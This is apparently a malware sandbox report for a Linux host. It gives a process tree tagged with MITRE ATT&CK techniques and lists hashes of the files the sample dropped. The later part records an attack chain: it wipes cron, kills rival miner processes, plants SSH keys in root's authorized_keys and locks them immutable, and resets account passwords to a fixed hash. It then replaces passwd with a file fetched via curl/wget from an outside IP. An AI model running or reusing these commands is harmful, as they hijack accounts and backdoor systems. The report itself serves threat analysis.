-
-
/usr/bin/dpkg-debdpkg-deb --control /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb /var/lib/dpkg/tmp.ci4⤵
-
/usr/sbin/tartar -x -f - "--warning=no-timestamp"5⤵
-
-
/usr/bin/tartar -x -f - "--warning=no-timestamp"5⤵
-
-
-
/usr/sbin/dpkg-debdpkg-deb --fsys-tarfile /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb4⤵
-
-
/usr/bin/dpkg-debdpkg-deb --fsys-tarfile /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb4⤵
-
-
/usr/sbin/rmrm -rf4⤵
-
-
/usr/bin/rmrm -rf4⤵
-
-
-
/usr/bin/dpkg/usr/bin/dpkg --status-fd 40 --configure --pending3⤵
- Software Deployment Tools
-
/usr/sbin/shsh -c -- "(test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)"4⤵
-
-
/usr/bin/shsh -c -- "(test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)"4⤵
-
/usr/lib/needrestart/dpkg-status/usr/lib/needrestart/dpkg-status5⤵
-
/usr/bin/mkdirmkdir -p /run/needrestart6⤵
-
-
/usr/bin/touchtouch /run/needrestart/unpacked6⤵
-
-
-
-
/var/lib/dpkg/info/man-db.postinst/var/lib/dpkg/info/man-db.postinst triggered /usr/share/man4⤵
-
/usr/bin/setprivsetpriv --reuid man --regid man --init-groups -- /usr/bin/mandb -pq5⤵
-
-
/usr/bin/mandb/usr/bin/mandb -pq5⤵
-
-
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
/usr/bin/test/usr/bin/test -e /usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service3⤵
-
-
/usr/bin/test/usr/bin/test -S /var/run/dbus/system_bus_socket3⤵
-
-
/usr/bin/gdbus/usr/bin/gdbus call --system --dest org.freedesktop.PackageKit --object-path /org/freedesktop/PackageKit --timeout 4 --method org.freedesktop.PackageKit.StateHasChanged cache-update3⤵
- Changes its process name
-
-
/bin/echo/bin/echo3⤵
-
-
/bin/shsh -c -- "test -x /usr/lib/needrestart/apt-pinvoke && /usr/lib/needrestart/apt-pinvoke -m u || true"3⤵
-
/usr/lib/needrestart/apt-pinvoke/usr/lib/needrestart/apt-pinvoke -m u4⤵
-
/usr/bin/dbus-senddbus-send --system "--dest=org.freedesktop.login1" --print-reply /org/freedesktop/login1 org.freedesktop.DBus.Properties.Get string:org.freedesktop.login1.Manager string:PreparingForShutdown5⤵
-
-
/usr/bin/rmrm -f /run/needrestart/unpacked5⤵
-
-
-
/usr/sbin/needrestart/usr/sbin/needrestart -m u4⤵
- Reads process memory
- Reads runtime system information
-
/usr/bin/systemd-detect-virt/usr/bin/systemd-detect-virt --vm --quiet5⤵
- Checks hardware identifiers (DMI)
- Checks CPU configuration
-
-
/usr/bin/systemd-detect-virt/usr/bin/systemd-detect-virt --container --quiet5⤵
-
-
/usr/local/sbin/whowho -r5⤵
-
-
/usr/local/bin/whowho -r5⤵
-
-
/usr/sbin/whowho -r5⤵
-
-
/usr/bin/whowho -r5⤵
-
-
/usr/bin/python3.12/usr/bin/python3.12 -5⤵
-
-
-
-
/bin/shsh -c -- "if [ -d /var/lib/update-notifier ]; then touch /var/lib/update-notifier/dpkg-run-stamp; fi; /usr/lib/update-notifier/update-motd-updates-available 2>/dev/null || true"3⤵
-
/usr/bin/touchtouch /var/lib/update-notifier/dpkg-run-stamp4⤵
-
-
/usr/lib/update-notifier/update-motd-updates-available/usr/lib/update-notifier/update-motd-updates-available4⤵
-
/usr/bin/apt-configapt-config shell StateDir Dir::State5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell ListDir Dir::State::Lists5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell DpkgStatus Dir::State::status5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell EtcDir Dir::Etc5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell SourceList Dir::Etc::sourcelist5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/findfind /var/lib/apt/lists/ /etc/apt/sources.list //var/lib/dpkg/status -type f -newer /var/lib/update-notifier/updates-available -print -quit5⤵
-
-
/usr/bin/dirnamedirname /var/lib/update-notifier/updates-available5⤵
-
-
/usr/bin/mktempmktemp -p /var/lib/update-notifier5⤵
-
-
/usr/lib/update-notifier/apt-check/usr/lib/update-notifier/apt-check --human-readable5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
/usr/bin/ischroot/usr/bin/ischroot -t6⤵
- Checks mountinfo of local process
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
- Reads runtime system information
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/mvmv /var/lib/update-notifier/tmp.x1Rc6IS7G0 /var/lib/update-notifier/updates-available5⤵
-
-
/usr/bin/chmodchmod +r /var/lib/update-notifier/updates-available5⤵
-
-
/usr/bin/rmrm -f /var/lib/update-notifier/tmp.x1Rc6IS7G05⤵
-
-
-
-
-
/usr/bin/catcat /etc/passwd2⤵
-
-
/usr/bin/grepgrep "/bin/bash\\|/bin/sh\\|/zsh\\|/fish"2⤵
-
-
/usr/bin/cutcut -d: -f12⤵
-
-
/usr/bin/trtr "\\n" " "2⤵
-
-
/usr/bin/chmodchmod +x /var/tmp/.xrx/uninstall.sh2⤵
- File and Directory Permissions Modification
-
-
/var/tmp/.xrx/uninstall.sh/var/tmp/.xrx/uninstall.sh 22⤵
-
-
/usr/bin/rmrm -rf /var/tmp/.xrx/uninstall.sh2⤵
-
-
/usr/bin/crontabcrontab -r2⤵
-
-
/usr/bin/chattrchattr -ia /etc/crontab2⤵
- Attempts to change immutable files
-
-
/usr/bin/rmrm -rf /etc/crontab2⤵
-
-
/usr/bin/touchtouch /etc/crontab2⤵
- Creates/modifies Cron job
-
-
/usr/bin/pkillpkill -9 xri2⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
-
/usr/bin/pkillpkill -9 xrx2⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
-
/usr/bin/pkillpkill -STOP xxi2⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
-
/usr/bin/pkillpkill -STOP xmu2⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
-
/usr/bin/pkillpkill -STOP dhcpi2⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
-
/usr/bin/chattrchattr -i /usr/lib/updated 22⤵
- Attempts to change immutable files
-
-
/usr/bin/chattrchattr -a /usr/lib/updated 22⤵
- Attempts to change immutable files
-
-
/usr/bin/rmrm -rf /usr/lib/updated2⤵
-
-
/tmp/xrx/init.sh./init.sh2⤵
-
-
/usr/bin/chattrchattr -i /root/.ssh/authorized_keys2⤵
- Attempts to change immutable files
-
-
/usr/bin/chattrchattr -a /root/.ssh/authorized_keys2⤵
- Attempts to change immutable files
-
-
/usr/bin/rmrm -rf /root/.ssh/authorized_keys2⤵
-
-
/usr/bin/rmrm -rf /root/.ssh/authorized_keys22⤵
-
-
/usr/bin/cpcp key /root/.ssh/authorized_keys2⤵
- Adds new SSH keys
-
-
/usr/bin/chattrchattr +ia /root/.ssh/authorized_keys2⤵
- Attempts to change immutable files
-
-
/usr/bin/chattrchattr -ia /etc/shadow2⤵
- OS Credential Dumping
- Attempts to change immutable files
-
-
/usr/bin/chattrchattr -ia /etc/passwd2⤵
- Attempts to change immutable files
-
-
/usr/sbin/usermodusermod -p "\$6\$8aivRNZIlSAxxOmo\$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/" root2⤵
- Modifies password files for system users/ groups
- OS Credential Dumping
-
-
/usr/bin/crontabcrontab -u root -r2⤵
-
-
/usr/bin/sudosudo -u root sh -c "echo \$HOME"2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
-
/usr/bin/shsh -c "echo \$HOME"3⤵
-
-
-
/usr/bin/rmrm -rf /root/.ssh/authorized_keys2⤵
-
-
/usr/bin/cpcp /var/tmp/.xrx/key /root/.ssh/authorized_keys2⤵
-
-
/usr/sbin/usermodusermod -p "\$6\$8aivRNZIlSAxxOmo\$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/" user2⤵
- Modifies password files for system users/ groups
- OS Credential Dumping
-
-
/usr/bin/crontabcrontab -u user -r2⤵
-
-
/usr/bin/sudosudo -u user sh -c "echo \$HOME"2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
-
/usr/bin/shsh -c "echo \$HOME"3⤵
-
-
-
/usr/bin/rmrm -rf /home/user/.ssh/authorized_keys2⤵
-
-
/usr/bin/cpcp /var/tmp/.xrx/key /home/user/.ssh/authorized_keys2⤵
-
-
/usr/sbin/usermodusermod -p "\$6\$8aivRNZIlSAxxOmo\$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/" root2⤵
- Modifies password files for system users/ groups
- OS Credential Dumping
-
-
/usr/bin/chattrchattr -iae /bin/passwd2⤵
- Attempts to change immutable files
-
-
/usr/bin/chattrchattr -iae /usr/bin/passwd2⤵
- Attempts to change immutable files
-
-
/usr/bin/mvmv /bin/passwd /bin/passwd.orig2⤵
-
-
/usr/bin/mvmv /usr/bin/passwd /usr/bin/passwd.orig2⤵
-
-
/usr/bin/curlcurl -sO http://185.252.178.82:6972/passwd2⤵
-
-
/usr/bin/wgetwget -q http://185.252.178.82:6972/passwd2⤵
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1SSH Authorized Keys
1Modify Authentication Process
1Pluggable Authentication Modules
1Scheduled Task/Job
1Cron
1Privilege Escalation
Abuse Elevation Control Mechanism
1Sudo and Sudo Caching
1Account Manipulation
1SSH Authorized Keys
1Scheduled Task/Job
1Cron
1Defense Evasion
Abuse Elevation Control Mechanism
1Sudo and Sudo Caching
1File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Indicator Removal
1Clear Linux or Mac System Logs
1Modify Authentication Process
1Pluggable Authentication Modules
1Virtualization/Sandbox Evasion
3System Checks
3Credential Access
Modify Authentication Process
1Pluggable Authentication Modules
1OS Credential Dumping
2/etc/passwd and /etc/shadow
1Proc Filesystem
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD561cfa0c5a9adcb8699107f1938a5d8c4
SHA14748b39c890427e3b23e427f2e5e59dd3cfbb19e
SHA2567093c9fe9eabfa7f44c0fc311a58cc02c108c7b636cbf519ad59a02449ed07ec
SHA51255e3421f6006ac122c43ed3df17263cab3756fe9ce51452460ac55a7edc4b7872aa9be2446589b5e03ca3bb7320552fc538e0374c408b764d0d8409a0ea21370
-
Filesize
1KB
MD539ae31c4efabd3fa55e71879ddb3f523
SHA1e5cda9d16e278b2cf225b18f7012a9ee7c988c79
SHA256919e35ee42381a437d59bd90e8740252eb9647a578f335de0ebed47275fe56e6
SHA5123511d4b09373ea5ee1e216b79cf6aa0b403e55971abd6475fd9dc9933de1aa1c1e7b273fe7d93750be6d911a8985ca30d5e6aac0636618d347e40136fa099e26
-
Filesize
1KB
MD54c9d0341763620e395a661863de9edb0
SHA1bd17de867fdd15deed4e99b31f11a1e434484495
SHA256be6c23bb9d5108ff62a22f9f14e6f3f836801871e3390bad98ff134ee6218ead
SHA512c06e64a99a3a1c7cd6c9c30646f060a0128057a5598a09094859604e689bfbf94a59bf55ebfe5d65b3cfec2adbae617d8b9972773718db5a0ae00075cf5caedd
-
Filesize
9KB
MD541d685bb374b8b9765cc8ad68c6ddd7c
SHA14d7f9893b486db574f737fd82f89f1db05d44e4e
SHA256aa668bd5e23e3f703518eec2e52fffd6275c897ba84ef8a34ef646ac4dde32f4
SHA512b9d5800641b0fb294d1688faf9dbd0a461a6347f405ab106dc6e2c71a0667c9a39eeb95904a218e5af57683a4f1882876f4ab538aecde442f68265c7467127a0
-
Filesize
16KB
MD537106c0ca44953e5d7da743c5293634f
SHA18466df9e62da69995aaf6706af447e41c34b8010
SHA2563e9b6f702bb7b5bef6331b69b9a4de18bfe8f7d006808213a72e0911a04fc507
SHA512e01226df669f3eee9f60acea93c70adb27a3442477e54157eb3182464a7be5323ddf943766e2370ef9e9138172373ae1781c87483685428bd4548f59249b3555
-
Filesize
1.8MB
MD58ba435a1928bd56bdafc1d1e44d8cebe
SHA1ab792cebe40ec46566b1c0285622209adcc3bf2f
SHA25674893bf4f22bb62714e33d5ed836c03b6fa6f33bdbbc7fc462247682258ab13d
SHA5125d87fa68747e1166de157d2eae45841165590650cc7e4bea5ffdfd03bc68cb7070d6a973e2bc63690df74b53576788f6f7901fa83823cf1af51eeca350f44f4d
-
Filesize
1.8MB
MD5e19832e2fc417bbc53c7583f3fc995d2
SHA1fd08444e6f4ae73b7f86fe0f0346b71f84ceec8c
SHA25647c70ad1112f7794a6d0cc4215b6ae2b0c5e9a58f535c8677963d1f2f4509e3f
SHA51278248ba44a1c5bac41ede29334e94eb5891e8fdc12190e1c2c40837d0613a6988384ca592ca7650a8cf0e9713dc76b5740300610d4f525bec1b1c8fa6c9fd13f
-
Filesize
652B
MD51e0f0dfa728ed7715510e29d0c820cfa
SHA19e20884889df0752af14f0afcc0a6bbdb5470c62
SHA2567263b977924b9c59af6a5ad7da21e3f85d24beb3c4f0d6515ff1eb06fc11af4a
SHA51241afc8ea626977e98101a9cf492c0d9736f32cc4bb2d0496d2a46769807a01f5282ba00c07141956eea7c364c7b5ce8966b2a891b7dd77d3fdab84b4ccd1f2b2
-
Filesize
372B
MD5f0183116fb005f86b0d573c6473fae9b
SHA16672eb52c0cb916df1c6924ace41b81264ef0b8b
SHA256b08ea9d4bf7879ee69d29795219f6958979932f80976133636eecf5d8e9f1272
SHA512314038597f986c2e1816b865e085014905b92e94d73f08b11a0b560362edb48a335a708617ae310375619752514475c93e48f6a4461e7675206cb5ec884f3a81
-
Filesize
4KB
MD56e67dede930df3bc51a5d372940d8c75
SHA103a54c296eb9f17c41ea1142f7f2c2c70d715e20
SHA256087c445cd41888ce3da908be88a19b2bec608e999d92cf006a2aaaebf9452bde
SHA51228867ada88b421d70616002150c5e91bbd402907365932f9b1a47e3a36233a4f16791e457ff7e1a59eaced3c4bf16626675b6d6e282a50fd9b94397b1126077b
-
Filesize
4KB
MD534eb56f174133f283fdc94da47b268f3
SHA1c68b6ee72b7027222df4bed6b2fba79a3c56b670
SHA256ad6b382be033c06573cc513c010fe8b7f6be7d43194923bf5e488ed093b8fd83
SHA512f5195388268211b15e3c27583138d541ec581cb8e3ccea4c26f40cace1a06826cf2997603bddac110e935f84453ca33af08c048d7be76951d9543f41ede2574d
-
Filesize
4KB
MD505ffb6efd8d30243a913f95453c376ab
SHA1d3b05c42a5c9db40d2f375f40764cc2c81e14fcc
SHA25678b6c50455d3659bb7effbb14312d8eeea86c3a248d0a497e43cf4d6d7ea0be3
SHA5124c008f42d41d0b150c70593bc9d30152b3738f3341a73d4d3ec1ec8c3e4194b0a633efc1a8570fbdbd29032c323686a58d8d2fc9c922e49d3c399db0c5e9f98b
-
Filesize
4KB
MD5edae9b7299f2afc09258160786a4dada
SHA1dd7aa0c8aa29e937efd88b9eb39811e1460b62b9
SHA256cf7d2275d2effcc231f426e078582b9665c4a2407e267c9e25546220308dd569
SHA5120e3341d862dde54e87b2cea0384cc79a4594f7a22a322d501fbb386559511cc8e6046bf134bc1496d04bddb80c8213dd0438368d3a5d20b82099a5a4c9cc30ff
-
Filesize
4KB
MD50c83c7b81780508a33c1ea43e49bd0ab
SHA11bd385df4de89b74a9e0eaeb42078a3aa13e7a56
SHA2569c1311fe3442b3427006b95fafa9e55261702b36fbc90b3300e9aca091498dd1
SHA51297328bd96c405168e5226780a4664f1a6c4406c7b3ec66899d898053346c3e070e7c7cf7e2b659a1781fe5822ec9a6440beb2047e98994977e576562f5d33747
-
Filesize
330B
MD5021da29c3bae39e0096af8d9ed4758d1
SHA1583f8cde39dab486d2a12ff2024c2f548c681df5
SHA256c38935487c65f47ec2737c950b35930bdf2ea9685c85dd141120e04fad13e806
SHA512e89e27af01b65bb15fd7e76f7260185594ba6300abcfde79d6ab3570624e97b3541547bdb683ff26c838b3d417c09c24d5ef05a3fe4bb01e2da134b99fd8ecf1
-
Filesize
64KB
MD5c62354d24707a76f34fb390a592f143a
SHA1c7bdfb9ec880e49f94433afb003a068dd6952e5d
SHA256a084533b25ad68a5a50d966a4078ff802e8c6176d6e73cd2f34b5ac28806a256
SHA5120c0640d64a79f5ce77dd9001e51a65b339c76bc32c84112903ddcbff0e90e016f6e8ba393cb415a4072ee7d72a24480550ee53aead9aaae77ae08d4d4698d6bd